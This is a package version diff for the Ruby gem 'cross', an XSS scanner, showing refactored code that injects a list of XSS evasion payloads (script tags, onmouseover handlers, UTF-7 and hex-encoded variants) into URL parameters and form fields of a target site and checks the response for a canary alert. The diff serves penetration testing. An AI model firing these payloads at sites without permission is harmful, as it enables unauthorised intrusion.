RubyGems - cross - Versions diffs - 0.60.0 → 0.70.0 - Mend

cross 0.60.0 → 0.70.0

Files changed (11) hide show

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
-  data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
+  metadata.gz: 0d64cb7b3b08fc4bb0cd84d9e6397d18f665480f
+  data.tar.gz: 75938bd016b68f625effb11d333591de5c5b4a2a
 SHA512:
-  metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
-  data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6
+  metadata.gz: 20299787fae7dbceff48b0a9ccede33d6e56398846c6957008abce06a529c6b2915b871ac8a7d1b3b5afa1b4248d01e990cbd526db91a92af845ccebaf3dd0c5
+  data.tar.gz: 88e76a3705afb351f0f0bc6fa3c44196056ab3958ee6cb8d68d7d0196f92213837685acfa3570abf59722e6de216be77da917238c8c5308e57e30760437a0bc4

data/.gitignore CHANGED

@@ -1,5 +1,5 @@
 *.swp
-cross.log
+*.log
 *.gem
 *.rbc
 .bundle

data/.ruby-gemset ADDED

	@@ -0,0 +1 @@
1	+ hacking

data/.ruby-version ADDED

	@@ -0,0 +1 @@
1	+ ruby-2.0.0-p247

data/bin/cross CHANGED

@@ -7,6 +7,8 @@ require 'cross'
 require 'getoptlong'
 require 'codesake-commons'
+$logger = Codesake::Commons::Logging.instance
 opts = GetoptLong.new(
   [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
   [ '--version', '-v', GetoptLong::NO_ARGUMENT ],
@@ -19,18 +21,26 @@ opts = GetoptLong.new(
   ['--user', '-U', GetoptLong::REQUIRED_ARGUMENT ],
   ['--password', '-P', GetoptLong::REQUIRED_ARGUMENT ]
 )
-trap("INT") { puts '['+'INTERRUPTED'.color(:red)+']'; exit -1 }
+trap("INT") { $logger.die "SIGINT detected. Giving up" }
-options={:exploit_url=>false, :debug=>false, :oneshot=>false, :sample_post=>"", :parameter_to_tamper=>"", :crawl=>{:enabled=>false, :url_prefix=>nil}, :auth=>{:username=>nil, :password=>nil}}
-$logger = Codesake::Commons::Logging.instance
-$logger.toggle_syslog
+options = {:exploit_url=>false,
+  :debug=>false,
+  :oneshot=>false,
+  :sample_post=>"",
+  :parameter_to_tamper=>"",
+  :auth=>{:username=>nil, :password=>nil},
+  :target=>""
+}
 opts.each do |opt, arg|
   case opt
   when '--help'
-    puts "usage: cross [-uDhv] target"
-    puts "     -u: exploits the URL string instead of looking at the form values"
+    puts "usage: cross [-D1StucUPhv] target"
     puts "     -D: turns debug on"
+    puts "     -1: random select a XSS attack pattern"
+    puts "     -S arg: when tampering posts, arg is a valid POST body used as reference. It can be also a text file containg the POST parameters."
+    puts "     -t arg: tells cross to tamper the given parameter. It must be used with -S flag turned on"
+    puts "     -u: exploits the URL string instead of looking at the form values"
     puts "     -v: shows version"
     puts "     -h: this help"
     exit 0
@@ -49,10 +59,8 @@ opts.each do |opt, arg|
     options[:debug]=true
   when '--exploit-url'
     options[:exploit_url]=true
   when '--crawl'
-    options[:crawl][:enabled]=true
-    options[:crawl][:url_prefix] = arg unless arg.nil?
+    $logger.die "deprecated. codesake-crawler must be used instead"
   when '--user'
     options[:auth][:username]=arg
   when '--password'
@@ -60,30 +68,26 @@ opts.each do |opt, arg|
   end
 end
-$logger.helo "cross " + Cross::VERSION + " is starting up"
+$logger.helo "cross", Cross::VERSION
+$logger.die "missing target" if ARGV.length != 1
+$logger.die "-S and -t flag must be used together" if (options[:sample_post].empty? && ! options[:parameter_to_tamper].empty?) or (! options[:sample_post].empty? && options[:parameter_to_tamper].empty?)
+options[:target] = ARGV.shift
 engine = Cross::Engine.instance
 engine.start(options)
 found = false
-$logger.die "missing target" if ARGV.length != 1
-$logger.die "-S and -t flag must be used together" if (options[:sample_post].empty? && ! options[:parameter_to_tamper].empty?) or (! options[:sample_post].empty? && options[:parameter_to_tamper].empty?)
-if engine.crawl?
-  result = engine.crawl(ARGV.shift)
-  $logger.die result[:message] if result[:status] == 'KO'
-  result[:links].each do |l|
-    $logger.log "Exploiting: #{options[:crawl][:url_prefix]+l}"
+engine.inject
+unless engine.results.empty?
-    found = engine.inject(options[:crawl][:url_prefix]+l)
-    $logger.ok "Canary found in output page. Suspected XSS" if found
-  end
-else
-  found = engine.inject(ARGV.shift)
-  $logger.ok "Canary found in output page. Suspected XSS" if found
+$logger.ok "Canary found in output page. Suspected XSS"
+engine.results.each do |res|
+  $logger.log res[:evidence]
+end
 end
-$logger.err "Canary not found" if ! found
+$logger.err "Canary not found" if engine.results.empty?
 $logger.helo "cross is leaving"

data/lib/cross/engine.rb CHANGED

@@ -1,6 +1,7 @@
 require 'mechanize'
 require 'logger'
 require 'singleton'
+require 'URI'
 require 'cross/xss'
@@ -10,84 +11,75 @@ module Cross
   class Engine
     include Singleton
-    attr_reader :agent
+    attr_reader   :agent
     attr_accessor :options
-    def debug?
-      @options[:debug]
+    attr_reader   :results
+    attr_reader   :target
+    def create_log_filename(target)
+      begin
+        return "cross_#{URI.parse(target).hostname.gsub('.', '_')}_#{Time.now.strftime("%Y%m%d")}.log"
+      rescue
+        return "cross_#{Time.now.strftime("%Y%m%d")}.log"
+      end
     end
     # Starts the engine
-    def start(options={:exploit_url=>false, :debug=>false, :auth=>{}})
-      @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")}
+    def start(options = {:exploit_url=>false, :debug=>false, :oneshot=>false, :sample_post=>"", :parameter_to_tamper=>"", :auth=>{:username=>nil, :password=>nil}, :target=>""})
+      @agent = Mechanize.new {|a| a.log = Logger.new(create_log_filename(options[:target]))}
       @agent.user_agent_alias = 'Mac Safari'
       @agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
       @options = options
+      @target = options[:target]
+      @results = {}
     end
-    def authenticate?
-      ! @options[:auth].nil?  and ! @options[:auth].empty?
-    end
-    def crawl?
-      @options[:crawl][:enabled]
-    end
-    def crawl(url)
+    # def crawl(url)
+    #   start if @agent.nil?
+    #   links = []
+    #   @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
+    #   begin
+    #     page=@agent.get(url)
+    #     page=@agent.get(url) if authenticate?
+    #     page.links.each do |l|
+    #       @agent.log.debug("Link found: #{l.href}") if debug?
+    #       links << l.href
+    #     end
+    #   rescue Mechanize::UnauthorizedError
+    #     return {:status=>'KO', :links=>[], :message=>'target website requires authentication'}
+    #   rescue => e
+    #     return {:status=>'KO', :links=>links, :message=>e.to_s}
+    #   end
+    #   return {:status=>'OK', :links=>links, :message=>''}
+    # end
+    def inject
       start if @agent.nil?
-      links = []
-      @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
-      begin
-        page=@agent.get(url)
-        page=@agent.get(url) if authenticate?
-        page.links.each do |l|
-          @agent.log.debug("Link found: #{l.href}") if debug?
-          links << l.href
-        end
-      rescue Mechanize::UnauthorizedError
-        return {:status=>'KO', :links=>[], :message=>'target website requires authentication'}
-      rescue => e
-        return {:status=>'KO', :links=>links, :message=>e.to_s}
-      end
-      return {:status=>'OK', :links=>links, :message=>''}
-    end
-    def inject(url)
-      start if @agent.nil?
+      $logger.log "Authenticating to the app using #{@options[:auth][:username]}:#{@options[:auth][:password]}" if debug? && authenticate?
-      $logger.log "Authenticating to the app using #{@options[:auth][:username]}:#{@options[:auth][:password]}" if debug?
+      @agent.add_auth(@target, @options[:auth][:username], @options[:auth][:password]) if authenticate?
-      @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
-      found = false
       if @options[:exploit_url]
         # You ask to exploit the url, so I won't check for form values
-        attack_url = Cross::Url.new(url)
-        Cross::Attack::XSS.each do |pattern|
-          attack_url.params.each do |par|
-            page = @agent.get(attack_url.fuzz(par[:name],pattern))
-            @agent.log.debug(page.body) if debug?
-            scripts = page.search("//script")
-            scripts.each do |sc|
-              $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
-              return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
-            end
+        theurl= Cross::Url.new(@target)
-            return false if options[:oneshot]
+        attack_url(theurl, Cross::Attack::XSS.rand) if oneshot?
-            attack_url.reset
+        if ! oneshot?
+          Cross::Attack::XSS.each do |pattern|
+            attack_url(theurl, pattern)
           end
         end
       else
         begin
-          page = @agent.get(url)
+          page = @agent.get(@target)
         rescue Mechanize::UnauthorizedError
           $logger.err 'Authentication failed. Giving up.'
           return false
@@ -99,48 +91,112 @@ module Cross
           return false
         end
-        $logger.log "#{page.forms.size} form(s) found" if debug?
-        Cross::Attack::XSS.each do |pattern|
-          $logger.log "using attack vector: #{pattern}" if debug?
-          page.forms.each do |f|
-            f.fields.each do |ff|
-              if  options[:sample_post].empty?
-                ff.value = pattern if options[:parameter_to_tamper].empty?
-                ff.value = pattern if ! options[:parameter_to_tamper].empty? && ff.name==options[:parameter_to_tamper]
-              else
-                ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
-                ff.value = pattern if ff.name==options[:parameter_to_tamper]
-              end
-            end
-            pp = @agent.submit(f)
-            $logger.log "header: #{pp.header}" if debug? && ! pp.header.empty?
-            $logger.log "body: #{pp.body}" if debug? && ! pp.body.empty?
-            $logger.err "Page is empty" if pp.body.empty?
-            scripts = pp.search("//script")
-            scripts.each do |sc|
-              return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
-            end
-            # This is for input html field javascript event evasion
-            inputs = pp.search("//input")
-            inputs.each do |input|
-              return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
-            end
-          end
-          return false if options[:oneshot]
+        if page.forms.size == 0
+          $logger.log "no forms found, please try to exploit #{@target} with the -u flag"
+          return false
+        else
+          $logger.log "#{page.forms.size} form(s) found" if debug?
+        end
+        attack_form(page, Cross::Attack::XSS.rand) if oneshot?
+        if ! oneshot?
+          Cross::Attack::XSS.each do |pattern|
+            attack_form(page, pattern)
+          end
         end
       end
-      found
+      @results.empty?
     end
     private
+    def oneshot?
+      @options[:oneshot]
+    end
+    def debug?
+      @options[:debug]
+    end
+    def authenticate?
+      ! ( @options[:auth][:username].nil?  &&  @options[:auth][:password].nil? )
+    end
+    def attack_url(url = Cross::Url.new, pattern)
+      $logger.log "using attack vector: #{pattern}" if debug?
+      url.params.each do |par|
+        page = @agent.get(url.fuzz(par[:name],pattern))
+        @agent.log.debug(page.body) if debug?
+        scripts = page.search("//script")
+        scripts.each do |sc|
+          if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:get, :evidence=>sc.children.text, :param=>par}
+            return true
+          end
+        end
+        inputs = page.search("//input")
+        inputs.each do |input|
+          if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:get, :evidence=>input['onmouseover'], :param=>par}
+            return true
+          end
+        end
+        url.reset
+      end
+      false
+    end
+    def attack_form(page = Mechanize::Page.new, pattern)
+      $logger.log "using attack vector: #{pattern}" if debug?
+      page.forms.each do |f|
+        f.fields.each do |ff|
+          if  options[:sample_post].empty?
+            ff.value = pattern if options[:parameter_to_tamper].empty?
+            ff.value = pattern if ! options[:parameter_to_tamper].empty? && ff.name==options[:parameter_to_tamper]
+          else
+            ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
+            ff.value = pattern if ff.name==options[:parameter_to_tamper]
+          end
+        end
+        pp = @agent.submit(f)
+        $logger.log "header: #{pp.header}" if debug? && ! pp.header.empty?
+        $logger.log "body: #{pp.body}" if debug? && ! pp.body.empty?
+        $logger.err "Page is empty" if pp.body.empty?
+        scripts = pp.search("//script")
+        scripts.each do |sc|
+          if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:post, :evidence=>sc.children.text}
+            return true
+          end
+        end
+        # This is for input html field javascript event evasion
+        inputs = pp.search("//input")
+        inputs.each do |input|
+          if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:post, :evidence=> input['onmouseover']}
+            return true
+          end
+        end
+      end
+      false
+    end
     def find_sample_value_for(sample, name)
       v=sample.split('&')
       v.each do |post_param|

data/lib/cross/url.rb CHANGED

@@ -11,17 +11,19 @@ module Cross
       @params = []
       @original_params = []
       @base_url = url.split('?')[0]
-      p_array = url.split('?')[1].split('&')
-      p_array.each do |p|
-        pp = p.split('=')
-        param = {}
-        param[:name] = pp[0]
-        param[:value] = pp[1] unless pp[1].nil?
+      if has_params?
+        p_array = url.split('?')[1].split('&')
+        p_array.each do |p|
+          pp = p.split('=')
+          param = {}
+          param[:name] = pp[0]
+          param[:value] = pp[1] unless pp[1].nil?
-        @params << param
-        @original_params  << param.dup
+          @params << param
+          @original_params  << param.dup
+        end
+        @original_params.freeze
       end
-      @original_params.freeze
     end
     def to_s
@@ -54,6 +56,9 @@ module Cross
       end
     end
+    def has_params?
+      ! @url.split('?')[1].nil?
+    end
     def params_to_url
       ret = ""
       @params.each do |p|

data/lib/cross/version.rb CHANGED

@@ -1,3 +1,3 @@
 module Cross
-  VERSION = "0.60.0"
+  VERSION = "0.70.0"
 end

data/lib/cross/xss.rb CHANGED

@@ -1,12 +1,11 @@
+require 'securerandom'
 module Cross
   module Attack
     class XSS
       CANARY = 666
-      def self.each
-        evasions = [
+      EVASIONS = [
           "a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
           "<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
           "<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
@@ -67,11 +66,17 @@ module Cross
           "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
           "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
           "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
-        ]
-        evasions.each do |pattern|
+      ]
+      def self.rand
+        Cross::Attack::XSS::EVASIONS[SecureRandom.random_number(Cross::Attack::XSS::EVASIONS.size)]
+      end
+      def self.each
+        Cross::Attack::XSS::EVASIONS.each do |pattern|
           yield pattern if block_given?
         end
       end
     end

metadata CHANGED

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: cross
 version: !ruby/object:Gem::Version
-  version: 0.60.0
+  version: 0.70.0
 platform: ruby
 authors:
 - Paolo Perego
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2013-10-11 00:00:00.000000000 Z
+date: 2013-10-17 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake
@@ -119,7 +119,8 @@ files:
 - .document
 - .gitignore
 - .rspec
-- .rvmrc
+- .ruby-gemset
+- .ruby-version
 - Gemfile
 - LICENSE
 - README.rdoc

data/.rvmrc DELETED

	@@ -1,2 +0,0 @@
1	- rvm use 1.9.3@cross
2	-